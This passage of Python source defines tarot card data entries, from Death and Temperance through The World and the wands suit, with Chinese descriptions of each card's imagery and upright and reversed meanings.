intro='传统的死神牌,通常是由骷髅人拿着镰刀来代表,而伟特将死神的意象提升到更深一层的境界。\n\n最显眼的就是那位骑着白马的骷髅骑士。他身边有四个人,国王、主教、女人、小孩,象征无论是世俗或出世、男或女、老或少,都逃不过死亡这个自然现象。国王抗拒死亡,被骷髅骑士践踏过去﹔主教的权杖掉在地上,双手合十崇敬死亡﹔女人跪下,别过脸不忍看﹔小孩不懂死亡,好奇的望着骷髅骑士。其中主教可能就是编号五的教宗牌,他掉落在地上的权杖象征世俗权力遇到死亡时毫无用处,仔细一看权杖顶似乎有三层圆圈,和教宗牌戴在头上的权冠相同,而主教头上戴的帽子状似尖尖的鱼头,代表双鱼世纪的结束,也可能暗示死神牌关联的希伯来文Nun,意思是鱼。跪着的女人可能是力量牌中的那位女性,她们的衣着与头冠都极为相似。再回到骷髅骑士,他头上那根红羽毛和愚人所戴的是同一根,他的旗帜是黑色背景,象征光芒的不存,上面五瓣蔷薇的图案是蔷薇十字会的图腾,关于此图腾的说法众多,可能是代表随着死亡而来的新生,另一说是象征火星与生命力,还有一说是象征美丽纯洁与不朽。远方的河流就是流经伊甸园的四条河流之一,称为冥河(Styx),象征川流不息的生命循环。河上有艘船,船的上方有个类似洞穴的地方,右方有个箭头(在死神的脚跟处)指向洞穴,这个洞穴可能是“神曲”一书中但丁前往阴间的通道,而牌中右方一条小径通往两座塔中(月亮和节制都有相同背景,这两座塔也可能是女祭司背后的柱子),代表通往新耶路撒冷的神秘旅程。象征永生的朝阳在两座塔间升起,似乎在告诉我们死亡并不是一切的终点。', words='结束', desc='死亡牌意味某种状况的结束。\n\n死亡为旧事物画上休止符,并让路给新事物。死亡牌代表改变的一段其间。我们可以这样说,生命中的某个章节就要结束了,而你对这份改变的接纳,将是变化自然而然地发生。\n\n抱持着“生命将会带来某些比它从你身上拿走的更美好的东西”的信念。在潜意识中,你或许也在渴望改变的发生,死亡牌即意味着改变正要出现。不要抗拒这份改变,试着去接纳它吧。', upright='必须结束旧有的现状、面临重新开始的时刻到了、将不好的过去清除掉、专注于心的开始、挥别过去的历史、展开心的旅程、在心里做个了结、激烈的变化。', reversed='已经历经了重生阶段了、革命已经完成、挥别了过去、失去了、结束了、失败了、病了、走出阴霾的时刻到了、没有转圜余地了。' ), init=False) temperance: TarotCard = field(default=TarotCard( id=14, index='temperance', type='major_arcana', orig_name='Temperance (XIV)', name='节制', intro='十四号的节制牌,出现在死神牌之后。大天使麦可手持两个金杯,把左手杯中的水倒入右手杯中。\n\n金发的天使身着白袍,背长红翅膀,胸前有个方形图案(地元素),中间是个橘色的三角形(火元素),同样的图案在正义牌中也可看到。天使头上则戴个饼图案,中间有一个小点,是炼金术中代表黄金的符号,也就是终极目标。天使脸上闪耀着和谐的光辉,怡然自在,他/她的右脚踏入象征潜意识的池塘中,左脚站在象征显意识的岸边石头上,代表两者之间的融合。塘边生长一丛爱丽斯花。远方有一条小径通往淡蓝色的两座山间,双山顶间闪耀着王冠般的金色光芒,类似如此的图像也曾出现于前一张死神牌中的小径、双塔与朝阳。恋人与审判牌中也有天使的出现。另外,大天使对应希腊神话中的彩虹之神,暴风雨后的彩虹,意味着节制牌已经从死神带给我们的恐惧中超脱出来了。整张牌带给人宁静祥和的感受,让人们明白死亡之后终获新生。', words='净化', desc='节制代表行动及感情的融合,带来内心的平静感觉。\n\n节制是一张代表行为,而非观念的牌。它代表对某种特定状况的适当行为。显示一种因为行为及情绪的结合,而带来内在平静的感觉。节制意味着结合自发性及知识的能力,运用精神的知识及理解力来调节行为的能力。它是指知道每种状况来临时,应该采取什么适当的反映或行为。\n\n节制牌暗示你较高层次的自我,和较低层次的自我可以和谐共存。你带着一种方向感行动,不管那是精神上或实质上的行动。它代表尽力而为,以达到你可以达到的境界。', upright='良好的疏导、希望与承诺、得到调和、有节制的、平衡的、沟通良好的、健康的、成熟与均衡的个性、以机智处理问题、从过去的错误中学习、避免重蹈覆辙、净化的、有技巧的、有艺术才能的。', reversed='缺乏能力的、技术不佳的、不懂事的、需反省的、失去平衡状态、沟通不良的、缺乏自我控制力、不确定的、重复犯错的、挫败的、受阻碍的、暂时的分离、希望与承诺遥遥无期。' ), init=False) the_devil: TarotCard = field(default=TarotCard( id=15, index='the_devil', type='major_arcana', orig_name='The Devil (XV)', name='恶魔', intro='在恶魔牌上,我们看到和恋人相似的构图,只是恋人牌的天使在这里换成了恶魔,而亚当夏娃已然沉沦,上天的祝福变成了诅咒。\n\n牌中的恶魔有蝙蝠翅膀、羊角、羊腿和鸟足,象征动物的本能与天性。牠的驴耳则代表固执。恶魔头上的倒立星币,顶端指向地面,代表物质世界。恶魔右手向上摆出黑魔法的手势,与教宗的祝福手势形成对比。手心的符号代表土星,限制与惰性之星,也是魔羯座的守护星。恶魔左手则持着火炬,同样向下导引到物质世界,似乎在煽动亚当的欲望。注意恶魔坐的地方并不是三度空间的立方体,而是二度空间的长方形,象征人们只看见感官所见的现实,却非全部的真实,好比瞎子摸象。前方的亚当夏娃同样长出角和尾巴,显露出野兽本能。亚当的尾巴尖端是朵火焰,夏娃则是葡萄,都是恋人牌树上结的果实,表示她们误用了天赋。两个人被铁链锁住,乍看无处可逃,但仔细一看,其实系在她们脖子上的链子非常的松,只要愿意,随时可以挣脱,但她们却没有,表示这个枷锁是他们自己套在自己身上的。恶魔牌背景全黑,光芒不存,代表精神上的黑暗。', words='诱惑', desc='魔鬼牌代表错以为别无选择。\n\n魔鬼牌代表一种错误的概念,认为事情别无选择。觉得“我所拥有的就是这些”或“这是我唯一的选择”。在宗教的前因后果当中,魔鬼引诱男人使它遗忘掉精神的探索,以及他的神圣目的。在一般性的占卜中,魔鬼代表一种控制生命的需求,你对与自己的可能性缺乏完整的关照。\n\n魔鬼牌描述的是一种对生命物质化的观点,或像王尔德(OscarWilde)所说的:“知道所有东西的价格,却不知道任何东西的价值。”它可能暗示在某种状况内受到限制,却不愿意去改变。它是一种“偷鸡摸狗胜过杀人放火”的态度。', upright='不伦之恋、不正当的欲望、受诱惑的、违反世俗约定的、不道德的、有特殊的艺术才能、沉浸在消极里、沉溺在恐惧之中的、充满愤怒和怨恨、因恐惧而阻碍了自己、错误的方向、不忠诚的、秘密恋情。', reversed='解脱了不伦之恋、挣脱了世俗的枷锁、不顾道德的、逃避的、伤害自己的、欲望的化解、被诅咒的、欲望强大的、不利的环境、盲目做判断、被唾弃的。' ), init=False) the_tower: TarotCard = field(default=TarotCard( id=16, index='the_tower', type='major_arcana', orig_name='The Tower (XVI)', name='塔', intro='一座位于山巅上的高塔,被雷击中而毁坏,塔中两人头上脚下的坠落。塔顶有个王冠受雷殛而即将坠落。塔象征物质,王冠象征统治和成就,也代表物质与财富,受雷一殛,便荡然无存。天上的落雷是直接来自上帝的语言,两旁的火花有二十二个,象征塔罗二十二张大牌。灰色的云降下灾难之雨,不分性别阶级,平等的落向每一个人。背景全黑,这是一段黑暗的时期。', words='毁灭', desc='高塔象征生命中无可避免的改变。\n\n这种改变是是从根基到顶端的完全崩解与毁灭,是一种无可挽救的崩溃。这种改变是突然而来的,有时候激烈无比,这是一种易于顺从而难以抗拒的改变。当高塔牌出现时,便是到了改变的时刻。现在再来为改变做准备,或选择如何改变都已太迟,现在你需要做的就是丢掉旧东西。', upright='双方关系破裂、难以挽救的局面、组织瓦解了、损失惨重的、惨烈的破坏、毁灭性的事件、混乱的影响力、意外的发展、震惊扰人的问题、悲伤的、离别的、失望的、需要协助的、生活需要重建的。', reversed='全盘覆没、一切都已破坏殆尽、毫无转圜余地的、失去了、不安的、暴力的、已经遭逢厄运了、急需重建的。' ), init=False) the_star: TarotCard = field(default=TarotCard( id=17, index='the_star', type='major_arcana', orig_name='The Star (XVII)', name='星星', intro='一位赤裸的金发女子,左膝跪在象征显意识的地面上,右脚踏在象征潜意识的池水里。她左右手各持一个水壶,壶中装的是生命之水,她右手壶的水倾倒入池,激起阵阵涟漪,左手壶的水则倒在青翠的草地上,分成象征人类五种感官的五道水流,其中一道又流回池塘,再度充实潜意识之泉。她身后有棵树,树上有只象征智慧的朱鹭,同时也代表埃及神话中的托特之神,是所有艺术的创造者。女子的后方则是一大片广阔开满花的草原,和一座山脉,天空一颗巨大的金色八角星,七颗白色的小八角星则环绕在四周。', words='希望', desc='星星牌意味创造力和对生命的可能性的信心。\n\n星星是一张代表重新点燃希望的牌。它代表相信明天会更好的内在信心。你可以直接体验潜意识,而不是它的种种符号或意象。你可以体验这种强而有力的能量,并将它导入你的生命中。例如,艺术家利用这种能量来工作,以创作某些足以触动观赏者心情和灵魂的作品。它是一张代表信心、希望和内在平静的牌。', upright='未来充满希望的、新的诞生、无限的希望、情感面精神面的希望、达成目标的、健康纯洁的、美好的未来、好运即将到来、美丽的身心、光明的时机、平静的生活、和平的处境。', reversed='希望遥遥无期的、失去信心的、没有寄托的未来、失去目标的、感伤的、放弃希望的、好运远离的、毫无进展的、过于虚幻、假想的爱情运、偏执于理想、希望破灭的。' ), init=False) the_moon: TarotCard = field(default=TarotCard( id=18, index='the_moon', type='major_arcana', orig_name='The Moon (XVIII)', name='月亮', intro='相较于其它的牌,月亮整体呈现的图面经常令人感到诡异。近景是一只龙虾爬出池塘的景象,龙虾象征比恐惧和兽性更深的情绪,伟特说牠总是爬到一半又缩回去。中景处有频频吠叫的一只狗和一匹狼,分位于左右两边,分别象征人类内心中已驯化和未驯化的兽性。中间有一条通往两塔之间,延伸向远处山脉的小径上,这条小径是通往未知的出口,只有微弱的月光映照着。一轮月亮高挂空中,总共有三个层次,最右边的是新月,最左边的是满月,而中间的女人脸孔则是伟特所谓的“慈悲面”,从新月渐渐延伸向满月,越来越大。月亮的外围则有十六道大光芒,和十六道小光芒,其下有十五滴象征思想之露珠。', words='不安', desc='月亮象征倾听你的梦,以找到内心世界的平静。\n\n想象是相当强而有力的,它可以让内心很快的产生和平、和谐和欢乐;它也可以以同样快的速度产生痛苦、惊惧、悲伤和愤怒。月亮是一张代表梦和想象的牌。梦是转化为意象的潜意识能量。当这股能量强烈到无法被吸收或理解时,可能会导致狂野的梦、噩梦,甚至疯狂。月亮牌所代表的潜意识恐惧,必须由我们单独去面对。\n\n月亮代表强烈的梦想和经由梦传达到你意识思想中的直觉。强而有力的梦企图告诉你某些事情。倾听你的梦,你将会发现你所要找寻的答案。', upright='负面的情绪、不安和恐惧、充满恐惧感、阴森恐怖的感觉、黑暗的环境、景气低落、白日梦、忽略现实的、未知的危险、无法预料的威胁、胡思乱想的、不脚踏实地的、沉溺的、固执的。', reversed='度过低潮阶段、心情平复、黑暗即将过去、曙光乍现、景气复甦、挥别恐惧、从忧伤中甦醒、恢复理智的、看清现实的、摆脱欲望的、脚踏实地的、走出谎言欺骗。' ), init=False) the_sun: TarotCard = field(default=TarotCard( id=19, index='the_sun', type='major_arcana', orig_name='The Sun (XIX)', name='太阳', intro='可爱的裸体孩童骑在马背上,跨越灰色的围墙,脸上带着微笑。\n\n孩童头上戴着雏菊花环,以及一根红色的羽毛。这根羽毛就是在愚人与死神出现的同一根,象征太阳牌已经跨越了死亡的界限,而重获新生。围墙后面种满向日葵,里头是一座人造的花园,而孩童跃离了花园,代表他不需要这些人工的产物,他是最纯真、自然、不需隐藏的,如同他一丝不挂的身体。向日葵共有四朵,象征四要素昂与小阿尔克那的四个牌组。有趣的是,四朵向日葵是向着孩童,而不是太阳,表示这位快乐的孩童已经拥有足够的能量。马匹背上没有马鞍,孩童不用缰绳控制牠,甚至连双手也不用,显示马匹象征的能量已经受到充分控制。孩童左手持着红色旗帜,左手象征潜意识,红色旗帜象征行动,表示他已经不用像战车那样用象征意识的右手来掌控,他可以轻而易举、自然的控制一切。背景的太阳是生命的源头,万物赖以维生之源,总共有21道光芒,代表愚人以外的21张大阿尔克那,仔细一看在上方罗马数字的旁边有一道黑色的曲线光芒,代表愚人(另有一说是太阳中心圆形的部分是愚人)。这样的更改是为了避免原本的暧昧。', words='生命', desc='太阳象征欢乐、内在的平和,以及表达自我的需求。\n\n它也代表理解到幸福是一种选择。太阳代表一种令人愉悦的解脱。它表示觉醒的力量足以驱逐黑暗。它代表一种表达内在无意识和潜意识力量的天赋趋力。它是充满希望、理想主义,以天真率直的。\n\n太阳象征欢乐和内在平静,而且感觉宇宙是一个充满乐趣和创造性的地方。太阳是自由的充分显现。它从意识层心智的日常限制中彻底解放,转为一种开放、觉醒及自由状态。它是一种可以带来肉体自由的内心自由。太阳显示出欢乐、和平、幸福及有创意的生活态度,并且深深体会到生命之美。', upright='前景看好的、运势如日中天的、成功的未来、光明正大的恋情、热恋的、美满的婚姻、丰收的、事件进行顺畅的、物质上的快乐、有成就的、满足的生活、旺盛。', reversed='热情消退的、逐渐黯淡的、遭遇失败的、分离的、傲慢的、失去目标的、没有远景的、失去活力的、没有未来的、物质的贫乏、不快乐的人生阶段。' ), init=False) judgement: TarotCard = field(default=TarotCard( id=20, index='judgement', type='major_arcana', orig_name='Judgement (XX)', name='审判', intro='天使加百列(Gabriel)在空中居高临下吹号角,号角口处有七条放射状的线,象征七个音阶,能够将人类从物质世界的限制解放出来,并且疗愈人们的身心。\n\n喇叭绑着一张正方形红十字旗帜,象征业力的平衡。天使下方是个象征潜意识的海洋,在女祭司帘幕后面就曾出现过,如今已接近终点。海洋上漂浮着许多载着人的棺材,棺材象征物质世界的旧模式。棺材中人全都是灰色的,其中最显眼的是一位象征显意识的男性,含蓄地仰望天使;一位象征潜意识的女性伸出双手,大方迎接天使的呼唤;以及象征重生人格的小孩,背对着我们。远处则是白雪霭霭的高山,伟特说这是抽象思考的顶峰。', words='复活', desc='审判象征清晰的判断力。\n\n审判牌意指你对人生的老旧观念已经死亡,你正在接受内心的召唤,去过一种更有意义的生活。审判牌代表此时你有清晰的判断力。作为问题的答案,这牌暗示你拥有清晰的判断力。此时你理解了你由生命所展示的试炼及挑战中学习到了什么。\n\n审判牌也可能是在形容你了解你的精神目的,也知道要达成它的必要步骤。它代表你能清楚地看到自己,以及生命的时光。这会使你对如何开始又有何收获,产生莫大的喜悦或惊慌。收成十分就近了,你可以用你的正直和诚实来面对你的报偿。现在你审判你自己,如果你没有得到所希望的,实在也没有藉口可推诿了,因为你收割的正是你努力的产物。', upright='死而复生、调整心态重新来过、内心的觉醒、观念的翻新、超脱了束缚的、满意的结果、苦难的结束、重新检视过去而得到新的启发、一个新的开始、一段新的关系。', reversed='不公平的审判、无法度过考验的、旧事重演的、固执不改变的、自以为是的、对生命的看法狭隘的、后悔莫及的、自责的、不满意的结果、被击垮的。' ), init=False) the_world: TarotCard = field(default=TarotCard( id=21, index='the_world', type='major_arcana', orig_name='The World (XXI)', name='世界', intro='终于来到愚人旅程的终点。一位赤裸的舞者自由地在空中跳舞,她外貌看起来虽是女的,但在许多版本的塔罗牌中,她是雌雄同体,象征愚人终于成功将阴阳两股力量融合。\n\n舞者身体缠绕着象征高贵与神圣的紫色丝巾,象征神性其实就在每个人身上。舞者轻柔随意地手持两根权杖,象征进化与退化的力量,她同时具备两者。舞者身旁环绕着一个椭圆桂冠,桂冠象征成功,而它围绕成的椭圆形就像愚人的0号形状,愚人无限的潜力,在世界牌中发挥得淋漓尽致。桂冠上下各有一条红巾缠绕,形成倒8符号,象征无限与永恒,这在魔术师与力量牌都曾出现过。在图中四角有人、老鹰、狮子、牛,这些符号曾经在命运之轮出现过,牠们在命运之轮中还拿著书汲取知识,最后在世界牌中完成使命。', words='达成', desc='世界描述一种来自内心的快乐,它也可能暗示持久的成功。这是一张象征永久和持续成功的牌。你已经到达了成功之门的前方,成功女神让你耐心等待,她会让你进入成功之门的,只不过是时间问题罢了。成功之门周围是你经历过的幸福与哀伤,成功与失败,在到达乐土之前回忆一下过去的时光是很有必要的。这张牌暗示只要你拥有一颗感恩的心,就必能在你为自己打造的美丽世界中,寻找到幸福与快乐。\n\n牌的本意是“达成”,它告诉我们所有的事情都可以达成,所有的梦想都可以成为现实,没有不可能得到的事物。只要有耕耘,就能有相应的收获。', upright='完美的结局、重新开始的、生活上的完美境界、获得成功的、心理上的自由、完成成功的旅程、心灵的融合、自信十足带来成功、生活将有重大改变、获得完满的结果。', reversed='无法完美的、一段过往的结束、缺乏自尊的、感觉难受的、态度悲观的、丑恶的感情、无法挽回的局势、不完美的结局、无法再继续的、残缺的。' ), init=False) ace_of_wands: TarotCard = field(default=TarotCard( id=22, index='ace_of_wands', type='minor_arcana', orig_name='Ace of Wands', name='权杖首牌', intro='一只手从云中伸出,强而有力,握住一根长满绿叶的权杖。那根权杖是如此茂盛,以致鲜嫩的绿叶几乎从杖上“爆”开,有八片叶子脱离权杖,在空中飞舞。遍地青草溪流。远方的城堡似乎暗示着未来成功的可能。', words='行动', desc='权杖首牌暗示这是一个好的开始,放开手脚勇敢做。\n\n权杖首牌表示实践计划的能量和欲望。权杖首牌象征一个计划强而有力的开始,代表着手新计划的渴望、力量与勇气。这张牌推出已经开始的行动,而且一定会产生具体的结果,与纸上谈兵完全不同。首牌出现在采取行动的时候,他们不是代表任何的计划于决定,而是发动新事物的具体行为。', upright='Creation, Willpower, Inspiration, Desire, Creative spark, New initiative, New passion, Enthusiasm, Energy', reversed='Lack of energy, Lack of passion, Boredom, Delays, Blocks, Hesitancy, Creative blocks' ), init=False) two_of_wands: TarotCard = field(default=TarotCard( id=23, index='two_of_wands', type='minor_arcana', orig_name='Two of Wands', name='权杖二', intro='一位身穿领主服装的男子,站在他的城墙上,俯视他的辽阔领土,遥望远方海洋。他右手拿着一颗类似地球仪的球体,左手扶着一根权杖。右边的权杖则是被铁环系在墙上。城墙上有个白百合与红玫瑰交叉的图案,白百合象征纯洁的思想,红玫瑰象征热情,暗示两者之间必须取得平衡。', words='决定', desc='权杖二意味着一个决定。\n\n权杖二并不代表具体的行动,而是决定本身,通常是身体上的决定。行动是由权杖一所代表。在决定行动之前,权杖二代表对选择的评估,它是你所习惯的东西与你所想拥有的东西之间的一个抉择。\n\n权杖二暗示因成长而不满当前环境,需要决定未来行动方向的时机。他表示你目前所拥有的事实是不够的,你将决定下一步要怎么做。', upright='Planning, Making decisions, Leaving home, First steps, Leaving comfort, Taking risks', reversed='Fear of change, Playing safe, Bad planning, Overanalyzing, Not taking action, Playing it safe, Avoiding risk' ), init=False) three_of_wands: TarotCard = field(default=TarotCard( id=24, index='three_of_wands', type='minor_arcana', orig_name='Three of Wands', name='权杖三', intro='山巅上站着一个成功的商人,三根权杖笔直地竖立在地面上,商人右手握着其中一根,目送自己的贸易船出海。天空是鲜明的黄色,海映着天,也是黄色。', words='远见', desc='权杖三意味着面向远方,你的未来在你的眼光里。\n\n权杖三可以表示旅行或将计划付诸实行。可以代表当你寻求自我内在意义的时候,你仍可保持相对的沉静;表示你一边在扩展自身内在于外的新大道与利益,一边在维持一种平衡的状态。权杖三同时也暗示你正在考虑你最近的状况,并且寻找你内在与外在的意义。', upright='Looking ahead, Expansion, Rapid growth, Momentum, Confidence, Growth, Foresight', reversed='Obstacles, Delays, Frustration, Restriction, Limitations, Lack of progress' ), init=False) four_of_wands: TarotCard = field(default=TarotCard( id=25, index='four_of_wands', type='minor_arcana', orig_name='Four of Wands', name='权杖四', intro='四根巨大的权杖耸立在前方,其上挂着象征胜利的花环。两位女子手持花束高举头顶欢庆舞蹈着,远方隐约可见庆祝的人群,呈现一幅和谐且繁荣的景象。右边有护城河上有座桥,通往远方的表示稳固庄园城堡。', words='稳定', desc='权杖四意味着坚定牢固的合作。\n\n权杖四描出一个坚固的家庭或工作环境,欢乐与分享是每天生活的一部分。权杖四代表坚固,将权杖三中所决定的计划变得稳固或实在的行为。它经常暗示搬入新家或换工作,也表示你在目前的环境中安定下来。', upright='Community, Home, Celebration, Celebrations, Reunions, Parties, Gatherings, Stability, Belonging', reversed='Lack of support, Transience, Home conflicts, Instability, Feeling unwelcome, Lack of roots, Home conflict' ), init=False) five_of_wands: TarotCard = field(default=TarotCard( id=26, index='five_of_wands', type='minor_arcana', orig_name='Five of Wands', name='权杖五', intro='迥异于权杖四的和谐稳定局面,权杖五呈现一群年轻人混战的场面。每个人手上都拿着一根杖,彼此僵持不下,谁也不让谁。伟特说:这是一场模仿的战役。', words='冲突', desc='权杖五暗示缺乏和谐或者内在的冲突。\n\n权杖五是一张代表冲突的牌,虽然冲突不至于伤害任何人,但却是所有人全盘卷入。只是权杖类型的天性,总是把生活看成战争,因为如果没有障碍,就没有冒险了。而从另外一方面来看,这张牌比较可以形容成比较,较量,竞争。', upright='Competition, Rivalry, Conflict, Arguments, Aggression, Tension, Rivals, Clashes of ego', reversed='Avoiding conflict, Respecting differences. end of conflict, Cooperation, Agreements, Truces, Harmony, Peace' ), init=False) six_of_wands: TarotCard = field(default=TarotCard( id=27, index='six_of_wands', type='minor_arcana', orig_name='Six of Wands', name='权杖六', intro='一位年轻男子,戴着胜利的桂冠,骑着白马凯旋而归。四周都是围绕簇拥着他的群众。白色代表纯洁,马象征力量。红色的外衣象征积极主动与热忱。男子手持的权杖饰以胜利花环。艰辛奋斗已然过去,他现在抬头挺胸,享受属于他的荣耀时刻。', words='自信', desc='权杖六暗示着对人生充满自信的态度。\n\n在这张牌中,火的乐观主义使其欲求和期望得到成功。这不是错误的乐观主义或虚无的期待,而是来自过去的成功及自信的一种真正的信仰。权杖六也表示工作的升迁、证实达成目标,或仅是一种自信的生活态度。', upright='Victory, Success, Public reward, Triumph, Rewards, Recognition, Praise, Acclaim, Pride', reversed='Excess pride, Lack of recognition, Punishment, Failure, No rewards, Lack of achievement' ), init=False) seven_of_wands: TarotCard = field(default=TarotCard( id=28, index='seven_of_wands', type='minor_arcana', orig_name='Seven of Wands', name='权杖七', intro='绿衣男子站在青葱的山顶上,手持权杖,奋力迎击敌人从山下攻上的六根权杖。他高举右手,表情坚毅。', words='挑战', desc='权杖七暗示经由坚韧不拔而获得的成功。\n\n权杖七表示你需要更大的挑战。权杖七的讯息是“不要放弃”。继续努力前进,你将得到成功的回报。你投注于完成目标的体力与行动,将是值得的。', upright='Perseverance, Defensive, Maintaining control, Protectiveness, Standing up for yourself, Defending yourself, Protecting territory', reversed='Give up, Destroyed confidence, Overwhelmed, Giving up, Admitting defeat, Yielding, Lack of self belief, Surrender' ), init=False) eight_of_wands: TarotCard = field(default=TarotCard( id=29, index='eight_of_wands', type='minor_arcana', orig_name='Eight of Wands', name='权杖八', intro='八根权杖整齐划一的在空中航行,背景是蔚蓝的天空与青翠的山丘平原,还有一条宁静的小溪流过。', words='自由', desc='权杖八意味旅行及自由流动的能量。\n\n权杖八代表了海外旅行、自由流动的能量,以及达成目标的清晰路径。过去的努力就是在为现在的人生可以自由的旅行而铺路。权杖八表示你的目标清楚可见,而且正轻松的向它们迈进。这点可以从八根权杖自由而无约束的掠过天际看出来。权杖八没有拘束的本性反映了这是很少阻碍的时机。它表示你是自由的、可投注热情、直接追求目标。', upright='Rapid action, Movement, Quick decisions, Speed, Progress, Sudden changes, Excitement', reversed='Panic, Waiting, Slowdown, Slowness, Chaos, Delays, Losing momentum, Hastiness, Being unprepared' ), init=False) nine_of_wands: TarotCard = field(default=TarotCard( id=30, index='nine_of_wands', type='minor_arcana', orig_name='Nine of Wands', name='权杖九', intro='一个壮汉靠着长杖,似乎在等待着什么。他的头上扎绷带,显示他在过去战役中曾经受伤,尚未复原。但他并不畏惧,仍然紧锣密鼓等待着敌人的下一波来袭。他身后竖立八根权杖,井井有条,像是栅栏,包围着壮汉所守护的家园。', words='谨慎', desc='权杖九暗示重新评估目前承诺的时候。\n\n对于既存的问题纵是期待将来能够解决,现在这个人开始回顾过去的作为,以便看清他是怎么走到今天的。他已经渐渐知道所有行为都会产生结果,就好比他目前的生活就是过去作为的结果,而将来的生活则是由现在的决定和作为来引导的。\n\n这张牌代表逐渐意识到聚焦于承诺和目的是多么重要的事了。与其栽种五百颗混合的种子来期待有好的结果,不如仔细评估只耕耘一种特殊的品种,并且悉心照料它们,以享受耕耘后的收获。', upright='Resilience, Grit, Last stand, Persistence, Perseverance, Close to success, Fatigue', reversed='Exhaustion, Fatigue, Questioning motivations, Stubbornness, Rigidity, Defensiveness, Refusing compromise, Giving up' ), init=False) ten_of_wands: TarotCard = field(default=TarotCard( id=31, index='ten_of_wands', type='minor_arcana', orig_name='Ten of Wands', name='权杖十', intro='一个男人奋力的扛着十根沉重的权杖,朝着远方的房子前进。他被权杖的重量压得喘不过气,疲累万分,但他仍不愿放弃,为了生活,一步一脚印的往前走。', words='责任', desc='权杖十暗示一个委任某些责任的时机。\n\n权杖十描绘暗示一个委任某些责任的时机。他被这些权杖给压的沉下去,而且它们也遮住了他的方向(即远方的房子)。他急切地想要涉入这么多的情况当中,结果,因为种种承诺和问题而不胜负荷。权杖十通常伴随着一种态度:“如果你想妥适的完成它,你就要自己做。你觉得身负重任,所以不能去信任别人也能完成这件工作。\n\n尽管负担重重,然而权杖十代表你在付出极大努力后所获得的成功。或许你会因为交付出去某些责任而受惠,因为那会减轻你的压力,并且用时间去深思长期以来的憧憬。当你实现目标时。你有充分的理由为你的成就感到骄傲,因为权杖是证实了,要梦想成真就需要坚持和努力。', upright='Accomplishment, Responsibility, Burden, Duty, Stress, Obligation, Burning out, Struggles', reversed='Inability to delegate, Overstressed, Burnt out, Failure to delegate, Shouldering too much responsibility, Collapse, Breakdown' ), init=False) page_of_wands: TarotCard = field(default=TarotCard( id=32, index='page_of_wands', type='minor_arcana', orig_name='Page of Wands', name='权杖侍从', intro='权杖侍从把权杖拄在地上,好奇地看着杖顶,好像在研究什么东西。他的服装是明亮的鲜黄色,外衣上有权杖家族图腾火蜥蜴,有些蜥蜴的嘴没有真正咬到尾巴,形成不完整循环,但有些却有。牌的背景是沙漠和三个金字塔。', words='开始', desc='权杖侍从象征新的挑战,新的消息,跃跃欲试的梦想。\n\n权杖侍从意指该是开始某些新事物的时候了。它是展开一项新方案或旅行(如果有其他旅行牌出现在牌局中)的行动,且将指引你一个新方向。权杖侍从牌描述当开始一项新的事业时,一种可以感觉到年轻活力的行动。虽然对于行动会感到紧张,但是他仍然充满激情和热心,热衷于探索有用的经验以及展开新的冒险。', upright='Exploration, Excitement, Freedom, Adventure, Fresh ideas, Cheerfulness, Energetic, Fearless, Extroverted', reversed='Lack of direction, Procrastination, Creating conflict, Hasty, Impatient, Lacking ideas, Tantrums, Laziness, Boring, Unreliable, Distracted' ), init=False) knight_of_wands: TarotCard = field(default=TarotCard( id=33, index='knight_of_wands', type='minor_arcana', orig_name='Knight of Wands', name='权杖骑士', intro='权杖骑士骑着健马,高举权杖,表情自信地看着远方。他穿着明亮黄色服装,上面同样有权杖的家族象征火蜥蜴,但蜥蜴的嘴没有触碰到尾巴,形成一个不完整的循环。骑士的头盔顶端和背後都饰着红色的长穗,还戴着红手套,他以左手拉着缰绳,健马的前蹄高高举起。远方背景中出现三座金字塔,金字塔呈现在马脚的下方。', words='改变', desc='权杖骑士象征充满活力,信心满满的迎接改变。\n\n充满活力,信心满满的迎接改变。权杖骑士所代表的是火元素当中的火元素。这张牌可以象征行动、旅行、改变以及为了自身缘故的活动。看得出来权杖骑士正在思考未来的行动,骑士正全神贯注于对向往目标的积极追求。这张牌经常代表一种态度——完成某件事情唯一的办法就是自己动手做。瞄一眼这张牌就会得到火、活动、热情及活力的印象。权杖骑士暗示需要挑战、爱好旅游和学习,并有教学的能力。', upright='Action, Adventure, Fearlessness, Courageous, Energetic, Charming, Hero, Rebellious, Hot tempered, Free spirit', reversed='Anger, Impulsiveness, Recklessness, Arrogant, Reckless, Impatient, Lack of self control, Passive, Volatile, Domineering' ), init=False) queen_of_wands: TarotCard = field(default=TarotCard( id=34, index='queen_of_wands', type='minor_arcana', orig_name='Queen of Wands', name='权杖皇后', intro='权杖皇后戴着盛开绿叶的王冠,穿着阳光般金黄服饰,坐在宝座上。她的体态强健。她的左手拿着一朵向日葵,她的右手持权杖,眼光向左望。宝座的扶手是两只狮子,后面悬吊的帷幕上,再度出现火象的狮子图腾和向日葵。她前方有一只黑猫守护,这里的黑猫似乎也在保护权杖皇后,使她免于受伤害。远方有三座金字塔,天空则是一片既明亮又祥和的浅蓝色。', words='决心', desc='权杖皇后代表心灵的强大,透过内在力量而达到成功。\n\n权杖皇后牌可以说是透过内在的力量和自信而获得成功的。当你面对逆境时勇气会帮助你达成目标。相信你所做的事,以及做你所相信的事,可以帮助你了解你的目标。', upright='Courage, Determination, Joy, Confident, Self-assured, Passionate, Determined, Social, Charismatic, Vivacious, Optimistic', reversed='Selfishness, Jealousy, Insecurities, Demanding, Vengeful, Low confidence, Jealous, Selfish, Temperamental, Bully' ), init=False) king_of_wands: TarotCard = field(default=TarotCard( id=35, index='king_of_wands', type='minor_arcana', orig_name='King of Wands', name='权杖国王', intro='权杖国王坐在宝座上,身躯稍微向前倾,好像随时准备出发。他右手持权杖,杖上长有新鲜的绿叶。宝座和披风饰以狮子和火蜥蜴,地上还有一只火蜥蜴陪伴着他。', words='稳重', desc='权张国王代表经由自律而成功。\n\n权杖国王代表热忱坚定,魄力十足,经由自律而成功。他为人诚实、积极而坦率,而且经常愿意接受新挑战。他认为过程比结果还重要,而且拒绝任何拖泥带水的挑战。权杖国王描绘一个强壮的人,能够透过他的意志力来领导及统御别人。他对自己有坚强的信念,因为他的信心是建立在自身的经验上。他知道他的方法有效,因为他尝试过也试验过这种方法。自律可以让你超越自己,因此逆就会有充分的时间和体力来掌握更好的机会,让你完成已着手之事。', upright='Big picture, Leader, Overcoming challenges, Leadership, Vision, Taking control, Daring decisions, Boldness, Optimism', reversed='Impulsive, Overbearing, Unachievable expectations, Forceful, Domineering, Tyrant, Vicious, Powerless, Ineffective, Weak leader' ), init=False) ace_of_cups: TarotCard = field(default=TarotCard( id=36, index='ace_of_cups', type='minor_arcana', orig_name='Ace of Cups', name='圣杯首牌', 